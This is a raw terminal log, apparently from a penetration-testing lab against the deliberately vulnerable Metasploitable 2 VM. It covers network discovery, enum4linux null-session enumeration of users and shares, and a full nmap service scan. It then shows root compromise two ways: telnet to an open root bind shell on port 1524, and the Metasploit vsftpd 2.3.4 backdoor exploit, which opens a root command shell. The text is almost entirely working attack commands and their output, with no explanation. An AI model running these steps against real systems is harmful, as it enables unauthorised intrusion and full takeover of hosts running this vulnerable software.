netdiscover -r 123.123.123.0/24
123.123.123.102 00:0c:29:c3:07:99 1 60 VMware, Inc.
root@KaliLNX:~# enum4linux 123.123.123.102
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Oct 1 18:37:40 2018
==========================
| Target Information |
==========================
Target ........... 123.123.123.102
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=======================================================
| Enumerating Workgroup/Domain on 123.123.123.102 |
=======================================================
[+] Got domain/workgroup name: WORKGROUP
===============================================
| Nbtstat Information for 123.123.123.102 |
===============================================
Looking up status of 123.123.123.102
METASPLOITABLE <00> - B
Workstation Service00>
METASPLOITABLE <03> - B
Messenger Service03>
METASPLOITABLE <20> - B
File Server Service20>
WORKGROUP <00> -
B Domain/Workgroup Name00>
WORKGROUP <1e> -
B Browser Service Elections1e>
MAC Address = 00-00-00-00-00-00
========================================
| Session Check on 123.123.123.102 |
========================================
[+] Server 123.123.123.102 allows sessions using username '', password ''
==============================================
| Getting domain SID for 123.123.123.102 |
==============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
=========================================
| OS information on 123.123.123.102 |
=========================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 123.123.123.102 from smbclient:
[+] Got OS info for 123.123.123.102 from srvinfo:
METASPLOITABLE Wk Sv PrQ Unx NT SNT metasploitable server (Samba 3.0.20-Debian)
platform_id :
500
os version :
4.9
server type :
0x9a03
================================
| Users on 123.123.123.102 |
================================
index: 0x1 RID: 0x3f2 acb: 0x00000011 Account: games
Name: games
Desc: (null)
index: 0x2 RID: 0x1f5 acb: 0x00000011 Account: nobody
Name: nobody
Desc: (null)
index: 0x3 RID: 0x4ba acb: 0x00000011 Account: bind
Name: (null)
Desc: (null)
index: 0x4 RID: 0x402 acb: 0x00000011 Account: proxy
Name: proxy
Desc: (null)
index: 0x5 RID: 0x4b4 acb: 0x00000011 Account: syslog
Name: (null)
Desc: (null)
index: 0x6 RID: 0xbba acb: 0x00000010 Account: user
Name: just a user,111,,
Desc: (null)
index: 0x7 RID: 0x42a acb: 0x00000011 Account: www-data
Name: www-data
Desc: (null)
index: 0x8 RID: 0x3e8 acb: 0x00000011 Account: root
Name: root
Desc: (null)
index: 0x9 RID: 0x3fa acb: 0x00000011 Account: news
Name: news
Desc: (null)
index: 0xa RID: 0x4c0 acb: 0x00000011 Account: postgres
Name: PostgreSQL administrator,,,
Desc: (null)
index: 0xb RID: 0x3ec acb: 0x00000011 Account: bin
Name: bin
Desc: (null)
index: 0xc RID: 0x3f8 acb: 0x00000011 Account: mail
Name: mail
Desc: (null)
index: 0xd RID: 0x4c6 acb: 0x00000011 Account: distccd
Name: (null)
Desc: (null)
index: 0xe RID: 0x4ca acb: 0x00000011 Account: proftpd
Name: (null)
Desc: (null)
index: 0xf RID: 0x4b2 acb: 0x00000011 Account: dhcp
Name: (null)
Desc: (null)
index: 0x10 RID: 0x3ea acb: 0x00000011 Account: daemon
Name: daemon
Desc: (null)
index: 0x11 RID: 0x4b8 acb: 0x00000011 Account: sshd
Name: (null)
Desc: (null)
index: 0x12 RID: 0x3f4 acb: 0x00000011 Account: man
Name: man
Desc: (null)
index: 0x13 RID: 0x3f6 acb: 0x00000011 Account: lp
Name: lp
Desc: (null)
index: 0x14 RID: 0x4c2 acb: 0x00000011 Account: mysql
Name: MySQL Server,,,
Desc: (null)
index: 0x15 RID: 0x43a acb: 0x00000011 Account: gnats
Name: Gnats Bug-Reporting System (admin)
Desc: (null)
index: 0x16 RID: 0x4b0 acb: 0x00000011 Account: libuuid
Name: (null)
Desc: (null)
index: 0x17 RID: 0x42c acb: 0x00000011 Account: backup
Name: backup
Desc: (null)
index: 0x18 RID: 0xbb8 acb: 0x00000010 Account: msfadmin
Name: msfadmin,,,
Desc: (null)
index: 0x19 RID: 0x4c8 acb: 0x00000011 Account: telnetd
Name: (null)
Desc: (null)
index: 0x1a RID: 0x3ee acb: 0x00000011 Account: sys
Name: sys
Desc: (null)
index: 0x1b RID: 0x4b6 acb: 0x00000011 Account: klog
Name: (null)
Desc: (null)
index: 0x1c RID: 0x4bc acb: 0x00000011 Account: postfix
Name: (null)
Desc: (null)
index: 0x1d RID: 0xbbc acb: 0x00000011 Account: service
Name: ,,,
Desc: (null)
index: 0x1e RID: 0x434 acb: 0x00000011 Account: list
Name: Mailing List Manager
Desc: (null)
index: 0x1f RID: 0x436 acb: 0x00000011 Account: irc
Name: ircd
Desc: (null)
index: 0x20 RID: 0x4be acb: 0x00000011 Account: ftp
Name: (null)
Desc: (null)
index: 0x21 RID: 0x4c4 acb: 0x00000011 Account: tomcat55
Name: (null)
Desc: (null)
index: 0x22 RID: 0x3f0 acb: 0x00000011 Account: sync
Name: sync
Desc: (null)
index: 0x23 RID: 0x3fc acb: 0x00000011 Account: uucp
Name: uucp
Desc: (null)
user:[games] rid:[0x3f2]
user:[nobody] rid:[0x1f5]
user:[bind] rid:[0x4ba]
user:[proxy] rid:[0x402]
user:[syslog] rid:[0x4b4]
user:[user] rid:[0xbba]
user:[www-data] rid:[0x42a]
user:[root] rid:[0x3e8]
user:[news] rid:[0x3fa]
user:[postgres] rid:[0x4c0]
user:[bin] rid:[0x3ec]
user:[mail] rid:[0x3f8]
user:[distccd] rid:[0x4c6]
user:[proftpd] rid:[0x4ca]
user:[dhcp] rid:[0x4b2]
user:[daemon] rid:[0x3ea]
user:[sshd] rid:[0x4b8]
user:[man] rid:[0x3f4]
user:[lp] rid:[0x3f6]
user:[mysql] rid:[0x4c2]
user:[gnats] rid:[0x43a]
user:[libuuid] rid:[0x4b0]
user:[backup] rid:[0x42c]
user:[msfadmin] rid:[0xbb8]
user:[telnetd] rid:[0x4c8]
user:[sys] rid:[0x3ee]
user:[klog] rid:[0x4b6]
user:[postfix] rid:[0x4bc]
user:[service] rid:[0xbbc]
user:[list] rid:[0x434]
user:[irc] rid:[0x436]
user:[ftp] rid:[0x4be]
user:[tomcat55] rid:[0x4c4]
user:[sync] rid:[0x3f0]
user:[uucp] rid:[0x3fc]
============================================
| Share Enumeration on 123.123.123.102 |
============================================
WARNING: The "syslog" option is deprecated
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP
[+] Attempting to map shares on 123.123.123.102
//123.123.123.102/print$
Mapping: DENIED, Listing: N/A
//123.123.123.102/tmp
Mapping: OK, Listing: OK
//123.123.123.102/opt
Mapping: DENIED, Listing: N/A
//123.123.123.102/IPC$
[E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
//123.123.123.102/ADMIN$
Mapping: DENIED, Listing: N/A
=======================================================
| Password Policy Information for 123.123.123.102 |
=======================================================
[E] Unexpected error from polenum:
Traceback (most recent call last):
File "/usr/bin/polenum", line 33, in
from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr
ImportError: cannot import name dcerpc_v4
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 0
=================================
| Groups on 123.123.123.102 |
=================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
==========================================================================
| Users on 123.123.123.102 via RID cycling (RIDS: 500-550,1000-1050) |
==========================================================================
[I] Found new SID: S-1-5-21-1042354039-2475377354-766472396
[+] Enumerating users using SID S-1-5-21-1042354039-2475377354-766472396 and logon username '', password ''
S-1-5-21-1042354039-2475377354-766472396-500 METASPLOITABLE\Administrator (Local User)
S-1-5-21-1042354039-2475377354-766472396-501 METASPLOITABLE\nobody (Local User)
S-1-5-21-1042354039-2475377354-766472396-502 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-503 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-504 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-505 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-506 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-507 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-508 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-509 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-510 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-511 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-512 METASPLOITABLE\Domain Admins (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-513 METASPLOITABLE\Domain Users (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-514 METASPLOITABLE\Domain Guests (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-515 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-516 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-517 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-518 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-519 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-520 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-521 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-522 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-523 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-524 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-525 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-526 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-527 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-528 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-529 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-530 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-531 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-532 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-533 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-534 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-535 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-536 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-537 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-538 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-539 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-540 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-541 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-542 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-543 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-544 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-545 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-546 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-547 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-548 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-549 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-550 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1000 METASPLOITABLE\root (Local User)
S-1-5-21-1042354039-2475377354-766472396-1001 METASPLOITABLE\root (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1002 METASPLOITABLE\daemon (Local User)
S-1-5-21-1042354039-2475377354-766472396-1003 METASPLOITABLE\daemon (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1004 METASPLOITABLE\bin (Local User)
S-1-5-21-1042354039-2475377354-766472396-1005 METASPLOITABLE\bin (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1006 METASPLOITABLE\sys (Local User)
S-1-5-21-1042354039-2475377354-766472396-1007 METASPLOITABLE\sys (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1008 METASPLOITABLE\sync (Local User)
S-1-5-21-1042354039-2475377354-766472396-1009 METASPLOITABLE\adm (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1010 METASPLOITABLE\games (Local User)
S-1-5-21-1042354039-2475377354-766472396-1011 METASPLOITABLE\tty (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1012 METASPLOITABLE\man (Local User)
S-1-5-21-1042354039-2475377354-766472396-1013 METASPLOITABLE\disk (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1014 METASPLOITABLE\lp (Local User)
S-1-5-21-1042354039-2475377354-766472396-1015 METASPLOITABLE\lp (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1016 METASPLOITABLE\mail (Local User)
S-1-5-21-1042354039-2475377354-766472396-1017 METASPLOITABLE\mail (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1018 METASPLOITABLE\news (Local User)
S-1-5-21-1042354039-2475377354-766472396-1019 METASPLOITABLE\news (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1020 METASPLOITABLE\uucp (Local User)
S-1-5-21-1042354039-2475377354-766472396-1021 METASPLOITABLE\uucp (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1022 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1023 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1024 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1025 METASPLOITABLE\man (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1026 METASPLOITABLE\proxy (Local User)
S-1-5-21-1042354039-2475377354-766472396-1027 METASPLOITABLE\proxy (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1028 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1029 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1030 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1031 METASPLOITABLE\kmem (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1032 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1033 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1034 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1035 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1036 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1037 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1038 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1039 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1040 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1041 METASPLOITABLE\dialout (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1042 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1043 METASPLOITABLE\fax (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1044 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1045 METASPLOITABLE\voice (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1046 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1047 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1048 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1049 METASPLOITABLE\cdrom (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1050 *unknown*\*unknown* (8)
================================================
| Getting printer info for 123.123.123.102 |
================================================
No printers returned.
enum4linux complete on Mon Oct 1 18:38:06 2018
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 123.123.123.201
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Issuer: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2010-03-17T14:07:45
| Not valid after: 2010-04-16T14:07:45
| MD5: dcd9 ad90 6c8f 2f73 74af 383b 2540 8828
|_SHA-1: ed09 3088 7066 03bf d5dc 2373 99b4 98da 2d4d 31c6
|_ssl-date: 2018-10-01T11:41:17+00:00; -5s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_DES_64_CBC_WITH_MD5
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 37107/tcp mountd
| 100005 1,2,3 46647/udp mountd
| 100021 1,3,4 37491/tcp nlockmgr
| 100021 1,3,4 41496/udp nlockmgr
| 100024 1 36546/udp status
|_ 100024 1 36856/tcp status
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open tcpwrapped
1099/tcp open java-rmi Java RMI Registry
1524/tcp open shell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info:
| Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 8
| Capabilities flags: 43564
| Some Capabilities: SupportsTransactions, SwitchToSSLAfterHandshake, Speaks41ProtocolNew, SupportsCompression, Support41Auth, ConnectWithDatabase, LongColumnFlag
| Status: Autocommit
|_ Salt: loe.T=pB5"I,?78Of2g0
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Issuer: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2010-03-17T14:07:45
| Not valid after: 2010-04-16T14:07:45
| MD5: dcd9 ad90 6c8f 2f73 74af 383b 2540 8828
|_SHA-1: ed09 3088 7066 03bf d5dc 2373 99b4 98da 2d4d 31c6
|_ssl-date: 2018-10-01T11:41:18+00:00; -5s from scanner time.
5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ VNC Authentication (2)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 00:0C:29:C3:07:99 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 0.003 days (since Mon Oct 1 18:36:30 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=208 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -5s, deviation: 0s, median: -5s
| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user:
, NetBIOS MAC: (unknown)
| Names:
| METASPLOITABLE<00> Flags:
00>
| METASPLOITABLE<03> Flags:
03>
| METASPLOITABLE<20> Flags:
20>
| \x01\x02__MSBROWSE__\x02<01> Flags:
01>
| WORKGROUP<00> Flags:
00>
| WORKGROUP<1d> Flags:
1d>
|_ WORKGROUP<1e> Flags:
1e>
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2018-10-01T07:41:16-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
# Options 1
1524/tcp open shell Metasploitable root shell
telnet 123.123.123.102 1524
root@KaliLNX:~# telnet 123.123.123.102 1524
Trying 123.123.123.102...
Connected to 123.123.123.102.
Escape character is '^]'.
root@metasploitable:/#
root@metasploitable:/# root@metasploitable:/#
root@metasploitable:/# root@metasploitable:/# id
uid=0(root) gid=0(root) groups=0(root)
# Option 2
Let go with: vsFTPd 2.3.4 - secure, fast, stable
oot@KaliLNX:~# searchsploit ftp |grep 2.3.4
Cat Soft Serv-U FTP Server 2.5.x - Brute Force | windows/remote/20334.java
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
msfconsole
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(vsftpd_234_backdoor) > set RHOST 123.123.123.102
RHOST => 123.123.123.102
msf exploit(vsftpd_234_backdoor) > exploit
[*] 123.123.123.102:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 123.123.123.102:21 - USER: 331 Please specify the password.
[+] 123.123.123.102:21 - Backdoor service has been spawned, handling...
[+] 123.123.123.102:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (123.123.123.201:41237 -> 123.123.123.102:6200) at 2018-10-01 18:59:58 +0700
id
uid=0(root) gid=0(root)
pwd
/